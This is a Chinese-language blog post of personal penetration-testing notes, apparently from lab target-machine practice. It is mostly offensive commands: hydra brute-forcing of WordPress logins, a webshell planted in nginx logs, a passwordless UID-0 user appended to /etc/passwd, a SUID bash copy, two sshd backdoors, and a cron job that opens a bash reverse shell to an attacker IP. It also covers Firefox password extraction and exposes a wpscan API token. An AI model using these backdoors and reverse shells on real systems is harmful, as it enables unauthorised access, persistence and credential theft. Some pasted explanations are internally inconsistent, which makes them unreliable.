知识点

标签：bin 知识点 文件 -- 用户 ssh root

sc

SC命令的格式：SC [Servername] command Servicename [Optionname= Optionvalues]

Servername：指定服务所在的远程服务器的名称。名称必须采用通用命名约定 (UNC) 格式（“\myserver”）。如果是在本地运行SC.exe，请忽略此参数。
command ：如query,start,stop,create,config等

Servicename：服务名，也就是要配置的那个服务的名字，例如你要启动一个服务你就输入sc start +你要启动的服务名称（并非是服务显示名称）。
Optionname= Optionvalues：是选项名和选项的值。

hydra

hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt http-post://10.10.249.106:8080

hydra -l wp-admin -P /usr/share/wordlists/rockyou.txt http-post://192.168.152.141/blog/wp-login.php

hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -p 12345 http-post://192.168.152.141/blog/wp-login.php

域名解析失败

vim /etc/hosts 打开hosts配置文件，添加上ip与域名，然后重启一下服务 然后就可以正常访问了

也可以用bash -c 'echo ip 域名 >> /etc/hosts'

重启一下网络服务

/etc/init.d/networking restart

wpscan

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

wpscan --api-token=OGdgn8Ekao1Pt4jgVrO3AsxsWcQ4yC1liIzYC3756Tk --url=http://192.168.152.141/blog -e p --plugins-detection aggressive

这里的token可以自己到wpscan官网注册获得

joomscan

joomscan --url http://xxx.xxx.com 可以扫描joomla服务的后台地址以及服务版本

cewl

cewl http://xxx.com >1.txt 爬取网站，生成一个字典

cewl http://xxx.com -m 9指定生成至少9位的密码

https://www.freebuf.com/articles/network/190128.html

rbash逃逸

它与一般shell的区别在于会限制一些行为，让一些命令无法执行
2.如何设置一个rbash

cp /bin/bash /bin/rbash # 复制一个bash，重命名为rbash
useradd -s /bin/rbash test # 设置用户test登陆的shell为rbash
mkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令

https://blog.csdn.net/qq_43168364/article/details/111830233

mail

在/var/mail/

/var/spool/mail/

可以看到邮件

邮件相关操作

linux用户的邮件存在哪里,在Linux系统中收发及查看邮件-CSDN博客

openssl

openssl passwd -1 -salt cll password

密码是password

/etc/passwd

user:123:0:0:root:/root:/bin/bash

用户名：密码：uid：gid：描述：家目录：哪种shell

4种可执行文件目录

/usr/bin/

/bin/

/usr/sbin/

/sbin/

echo

追加： echo " " >> 文件名

覆盖： echo " " > 文件名

ximong:~$ cat aa.sh　#打印文件aa中原来的内容,显示aa

aa

ximong:~$ echo bb >> aa.sh # 　在文本末尾追加

ximong:~$ cat aa.sh

aa

bb

ximong:~$ echo cc >aa.sh　　#覆盖

ximong:~$ cat aa.sh

cc

nginx日志写shell

/var/log/nginx/access.log

可以尝试在UA头和URL写一句话木马

wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.43.192/thankyou.php?FUZZ=/etc/passwd

添加root用户

echo "admin::0:0:admin:/root:/bin/bash">>/etc/passwd

用户名:admin

密码:空

sudo

sudo -u jens /home/jens/backups.sh

“以jens用户的身份来执行/home/jens/backups.sh这个脚本”。

drush

创建新用户

drush user-create username --mail='[email protected]' --password="password"

删除用户

drush user-cancel username

更改密码

drush user-password admin --password="new_pass"

获取不到靶机ip地址

启动靶机的时候屏幕中间出现蓝色按住shift键后按e，在末尾处，找到ro，将ro 替换为 rw signie init=/bin/bash

按下Ctrl键+X键

查看当前网卡IP信息 ip a

网卡为 ens33

.编辑网卡配置文件vim /etc/network/interfaces

重启网卡服务 /etc/init.d/networking restart

重启靶机就可以了

gopherus工具

gopherus是一款生成gopher链接来帮助我们利用SSRF和获得RCE的工具，当然，使用的前提是一个地方验证了SSRF漏洞，而且gopher协议又没被过滤

1.下载

git clone http://github.com/tarunkant/Gopherus/archive/refs/heads/master.zip

2.解压

unzip master.zip

python2 gopherus.py --exploit mysql

输入用户名

输入要执行的操作

ssh-keygen

ssh-keygen 是一个用于创建、管理和转换身份验证密钥的工具，这些密钥通常用于 SSH 协议以实现安全的远程登录或其他加密的网络连接。

在你给出的命令 ssh-keygen -f upfine 中，-f 选项用于指定输出密钥文件的名字。但是，这里有一点需要注意：

1. 通常，ssh-keygen 默认会创建两个文件：一个私钥文件（默认名为 id_rsa 或你指定的名称，但带有私钥的扩展名，如 .pem、.ppk 等）和一个公钥文件（通常是私钥文件名加上 .pub 后缀）。
2. 当你使用 -f 选项时，你通常只指定私钥文件的名称，公钥文件将自动具有相同的名称但带有 .pub 后缀。
3. upfine 可能是你想要为私钥文件命名的名称，但除非你指定了密钥类型（如 -t rsa），否则 ssh-keygen 会默认使用 RSA 密钥类型。

因此，如果你运行 ssh-keygen -f upfine，你可能会得到两个文件：upfine（私钥文件）和 upfine.pub（公钥文件）。

但是，为了完整性和明确性，我建议你还指定密钥类型，例如：

bash复制代码

ssh-keygen -t rsa -f upfine

这将明确指示 ssh-keygen 使用 RSA 密钥类型，并将私钥保存到名为 upfine 的文件中。

ssh公钥登录

1、生成ssh密钥对
ssh-keygen -f id_rsa

2、上传公钥
scp /home/kali/id_rsa.pub [email protected]:~/
cd /home/snape
3、修改权限和名称
chmod 640 id_rsa.pub
赋予公钥执行权限，注意这里要先进入/home/snape才能看到公钥
mv id_rsa.pub authorized_keys
改公钥的文件名，这是规定，不然会连不上
4、移动公钥到hermoine/.ssh/目录下面
/home/hermoine/bin/su_cp -p /home/snape/authorized_keys /home/hermoine/.ssh/
使用su_cp把snape上的公钥放到hermoine用户的ssh文件下，这个命令输入后可以查看一下/home/hermoine/.ssh/
是否有该文件

5、用私钥连接ssh
ssh [email protected] -i /home/kali/id_rsa

Firefox Decrypt

.mozilla文件，这个文件里面包含有火狐浏览器各种信息乃至账密。这个工具专门提取该文件信息的工具

1.我是先下载到本机然后拖到kali里面的

2.wget https://github.com/lclevy/firepwd/archive/refs/heads/master.zip
下载firepwd工具

3.cd firepwd-master
进入工具文件夹

4.sudo pip install -r requirements.txt
下载所需模块

5.cp firepwd-master/firepwd.py demo/firefox/g2mhbq0o.default
将脚本复制到要读取数据的火狐文件中

6.cd demo/firefox/g2mhbq0o.default
进入保存数据的火狐文件

7.python3 firepwd.py
执行脚本，读取数据

是否在docker环境

cat /proc/1/cgroup

探测内网存活主机

for i in {1..254}; do
ping -c 1 192.168.152.$i
done

ss -pantu | grep server

这个命令组合在Linux系统中用于查找与“server”相关的网络活动。具体来说，这个命令由几个部分组成，我们逐一解释：

1. ss: 这是一个用于查看系统套接字统计信息的工具。与netstat类似，但ss通常更快，因为它直接从内核中获取套接字信息，而不是从/proc或/net目录中读取。
2. -p: 这个选项告诉ss显示与每个套接字关联的进程信息。例如，它会显示哪个进程正在监听或连接到特定的套接字。
3. -a: 显示所有套接字。默认情况下，ss可能只显示监听套接字，但使用-a选项会显示所有套接字，包括已建立的连接、TIME_WAIT套接字等。
4. -n: 这个选项在原始命令中并未明确给出，但通常与ss一起使用来避免解析服务名（如将端口号解析为“http”或“ssh”等）。由于原始命令中没有-n，ss可能会尝试解析服务名。
5. -t: 仅显示TCP套接字。如果你只对TCP连接感兴趣，这个选项很有用。
6. -u: 仅显示UDP套接字。但在你的命令中，这个选项并没有给出，所以我们只关注TCP套接字。
7. |: 这是一个管道符号，用于将一个命令的输出作为另一个命令的输入。
8. grep server: 使用grep命令搜索包含“server”的行。这允许你过滤出与“server”相关的行，可能是服务名、进程名或其他任何包含“server”的文本。

综上所述，ss -pantu | grep server这个命令会列出所有TCP套接字（包括监听的和已建立的连接），并显示与每个套接字关联的进程信息。然后，它会使用grep过滤出包含“server”的行，这有助于你快速找到与“server”相关的网络活动或进程。

node.js

node.js技术就是用于利用javascript代码在服务器上搭建web应用程序，而且这样搭建出来的web应用程序有很多独有的优势，比如非阻塞机制，异步输入输出之类的模型，使得这些web应用程序在处理某些特定程序时性能大大提高，并且通常都是基于一些已有的框架和库来进行开发，而express.js库是基于web应用开发使用的最多的

date

date '+Today is %A, %B %d, %Y %H:%M:%S.'

Today is 星期二, 七月 02, 2024 11:10:27.

图片隐写查看

输入steghide命令使用info参数查看图片

steghide info trytofind.jpg

1. 提取数据
2. steghide extract -sf trytofind.jpg、

时间伪造

touch -r 目标时间戳的文件 要修改时间戳的文件

锁定文件

chattr -i 目标文件名

解锁也是这个命令

ltrace

ltrace命令 是用来跟踪进程调用库函数的情况。

last

在Linux中可以使用Last查看账号SSH登录情况

last|grep root

useradd

useradd -p openssl passwd -1 -salt 'salt' 123456 test -o -u 0 -g root -G root -s /bin/bash -d /home/test

这条命令尝试使用 useradd 命令来创建一个新用户，但在使用方式和参数上存在一些潜在的问题和误解。下面我将逐一解释这条命令的各个部分，并指出可能的问题和如何正确执行类似的操作。

命令解析：

• useradd：用于在Linux系统中添加新用户。
• -p：用于指定用户密码的加密字符串。但是，通常不推荐直接在命令行中使用明文密码来生成加密字符串，因为这可能会被记录在命令历史或系统日志中。
• openssl passwd -1 -salt 'salt' 123456：这部分尝试使用OpenSSL的passwd命令来生成密码123456的MD5加密字符串，并指定了盐值'salt'。然而，-1选项现在可能不被所有OpenSSL版本支持（或已弃用），因为它指定了MD5加密方式。此外，直接在命令行中硬编码盐值可能不是最佳实践，因为盐值应该是随机的。
• test：这是你想要创建的用户名。
• -o：允许创建UID为0的用户（通常是root用户），这在大多数情况下是不推荐的，因为UID 0具有对系统的完全访问权限。
• -u 0：设置用户的UID为0，这通常与root用户相关联。
• -g root：设置用户的主组为root组。
• -G root：将用户添加到root附加组中，但这里与-g参数重复了，因为通常-g已经指定了主组。
• -s /bin/bash：设置用户的登录shell为bash。
• -d /home/test：设置用户的家目录为/home/test。

潜在问题和建议：

1. UID 0（root）的问题：通常不建议为非root用户设置UID为0，因为这会给该用户root级别的权限。如果确实需要这样的用户，请确保你了解这样做的风险，并考虑使用sudo来管理权限。
2. 密码生成：如果你需要生成密码的加密字符串，建议使用更安全的方法，比如使用chpasswd命令（如果可用），或者通过脚本生成加密密码后通过文件或其他安全方式传递。
3. 盐值：虽然可以指定盐值，但最好让系统生成一个随机的盐值，以增加密码的安全性。
4. 命令安全性：直接在命令行中指定明文密码（即使它会被加密）可能会带来安全风险。考虑使用更安全的方式来处理密码。

修改后的命令示例（不使用UID 0）：

bash复制代码

openssl passwd -1 -salt $(openssl rand -base64 4) '123456' | sudo useradd -p $(cat) -u $(id -u nobody + 1) -g users -G sudo -s /bin/bash -d /home/test test

注意：

• 这个命令使用了openssl rand -base64 4来生成一个随机的盐值。
• 使用$(cat)来从管道中读取加密后的密码。
• 假设nobody用户存在，并且你希望新用户的UID比nobody大1（这只是一个示例，你应该根据你的系统情况选择合适的UID）。
• 这里将用户的主组设置为users，并添加了sudo组以便该用户可以使用sudo命令（根据实际需要调整）。

请根据你的具体需求和安全策略调整这些命令。

suid shell

suid shell 主要是方便提权，配合普通用户使用
使用之后就会让普通用户毫无压力提权，自然也达到了类似权限维持的效果，原理如下：

首先Linux系统上，都会有一个叫Bash的shell文件，这个时候我们可以把这个shell文件copy一份到另外一个文件夹
再把另外一个文件夹加上us（即suid）的一个权限
这样其他用户在登录时，利用suid就可以轻松提权
步骤如下

将文件复制出来

cp /bin/bash /tmp/shell
赋予suid权限

chmod u+s /tmp//shell
这样就设置成功了，我们再使用普通用户登录

以普通用户执行刚才的文件

/tmp/shell -p

ssh软连接

ssh配置中开启了PAM进行身份验证

查看是否使用PAM进行身份验证：

cat /etc/ssh/sshd_config|grep UsePAM

为Yes即可使用

ln -sf /usr/sbin/sshd /tmp/su ;/tmp/su -oPort=9999
开启软链接，链接端口为9999

firewall-cmd --add-port=9999/tcp --permanent
开启防火墙规则，不然会连接不上

firewall-cmd --reload
重启防火墙服务

firewall-cmd --query-port=9999/tcp
查看防火墙9999端口是否被放行，回显为YES即成功放行

ssh [email protected] -p 9999
使用软链接登录，密码可以随便输入
（192.168.149.133为我环境中目标的ip）

ssh wrapper

简单点就是从sshd fork出一个子进程，输入输出重定向到套接字，并对连过来的客户端端口进行了判断。

服务端（被攻击端）执行如下命令*

cd /usr/sbin/
进入sshd文件所在目录

mv sshd ../bin/
将正常sshd文件移出

echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
将脚本写入新的sshd文件

chmod u+x sshd
赋予文件执行权限

/etc/init.d/sshd restart 或者service sshd restart
重启ssh服务

客户端执行如下命令

socat STDIO TCP4:目标ip:22,sourceport=13377

计划任务

1、创建一个sh脚本

，例如在/etc下创建了一个shell.sh的脚本，内容如下

!/bin/bash

bash -i >& /dev/tcp/192.168.15.130/6666 0>&1
注意：这里的192.168.15.130为我们kali的攻击机的ip，端口为我们攻击机接收的端口，相当于控制目标主动来连我们

2、赋予执行权限

chmod +sx /etc/shell.sh
3、写入计划任务

vi /etc/crontab
打开计划任务文件
将下面的指令添加到该文件中，意思就是每分钟执行一次我们的恶意文件

*/1 * * * * root /etc/shell.sh

4、重启计划任务

service crond restart

5、客户端开启监听

这时候在我们的kali攻击器开启监听就可以成功获取到目标反弹回来的权限

标签：bin,知识点,文件,--,用户,ssh,root
From： https://www.cnblogs.com/cll-wlaq/p/18307299